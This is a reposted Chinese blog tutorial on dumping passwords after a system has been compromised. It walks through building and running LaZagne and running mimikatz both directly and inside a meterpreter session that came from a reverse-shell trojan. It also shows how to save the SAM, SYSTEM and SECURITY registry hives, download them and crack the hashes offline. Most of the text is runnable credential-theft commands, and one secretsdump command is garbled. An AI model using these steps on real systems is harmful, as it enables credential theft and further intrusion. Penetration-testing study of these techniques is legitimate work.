后滲透中的密碼抓取


使用laZagne來抓取密碼

什么是laZagne呢,它是一個Pythono編寫的一個很強大的密碼抓取工具,有名的工具比如mimikatz,但是只能限於windwos情況下進行抓取,並且對於免殺方面的工作還要我們自己來做(但是msf等后滲透工具已經集成了,相對說利用較為方便)。

相對於laZagne來說就要差一點,因為它不僅支持跨平台,又因為使用python進行編譯的,免殺的效果就相對於mimikatz來說就強一點。

項目地址

下載並且進行編譯:

支持語言:Python2.x

先安裝Python的模塊
pip install pyinstaller

下載項目

git clone https://github.com/AlessandroZ/LaZagne.git

之后進入對應的文件夾(MAC/Linux/win)

進行編譯

pyinstaller --onefile -w lazagne.py

然后就運行
laZagne.exe all就會枚舉出瀏覽器存儲的密碼(我的瀏覽近百條明文密碼都被抓取到了),至於想要抓取系統的密碼hash就需要管理員的權限(mimikatz也是一樣的),這個就不提這個了。

關於laZagne的更多的高級用法就去項目里面查看,這里不再累述。

mimikatz抓取密碼

老牌的密碼抓取神器了,msf里面是直接集成了,獲取了meterpreter的情況下直接運行.

先看看一般用法,在CMD中執行
mimikatz
然后在執行privilege::debug用於提升權限

導出密碼hash
sekurlsa::logonpasswords

后記:一切的情況都是在管理員情況下執行的!!(並且其實一執行360就會報毒的,還有就是關於這種在線的導出hash,其實很容易的被抓到的),其實mimikatz還有很多的功能,比如制造票據等等啦,涉及到域滲透的東西了,我還沒有理解。以后進行補充。

下面就來介紹一下如何離線導出hash

在windows下破解hash值

需要工具:mimikatz
項目地址
這里面假設我們已經獲取到了一個meterpreter的shell,接下來我們先試試msf自帶的mimikatz怎么樣,再試試離線破解hash

在meterpreter中使用mimikatz也是必須要管理員的權限,這里面我是以管理員形式運行的木馬反彈的meterpreter。

首先先加載mimikatz

meterpreter > load mimikatz 
Loading extension mimikatz...[!] Loaded x86 Mimikatz on an x64 architecture.

[!] Loaded Mimikatz on a newer OS (Windows 10 (10.0 Build 17763).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > 

接着抓取密碼

meterpreter > msv  獲取的是hash值

meterpreter > ssp  獲取的是明文信息

meterpreter > wdigest  讀取內存中存放的賬號密碼明文信息

meterpreter > kerberos

運行自定義的命令

meterpreter > mimikatz_command -f a::  輸入一個錯誤的模塊,可以列出所有模塊

meterpreter > mimikatz_command -f samdump::  可以列出samdump的子命令

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f handle::list  列出應用進程

meterpreter > mimikatz_command -f service::list  列出服務

Ok好了接下來我們就來試試離線的抓取hash

離線抓取hash是很必要的,因為很多時候、很多環境下是不允許執行、上傳mimikatz的

要想離線抓取hash首先我們需要備份注冊表
進入shell中執行以下命令

reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

這個時候當前目錄就會出現三個.hiv的文件

利用meterpreter將他們下載下來
download xxx.hiv 保存路徑

注意:導出注冊表也是需要管理員的權限的,不然導出的是空的

接下來將他們放到mimikatz同一目錄下執行

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

成功!!!

當然不僅可以在Windows上破解在Linux上也是可以的,這里面借助的是kali中的impacket,默認的路徑位於/root/impacket/examples/secretsdump.py

命令如下:
root@John:/tmp#python /root/impacket/examples/secretsdump.py‐samsa m.hiv ‐security security.hiv ‐system sys.hiv LOCAL

不過我的kali怎么沒有呢.jpg


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM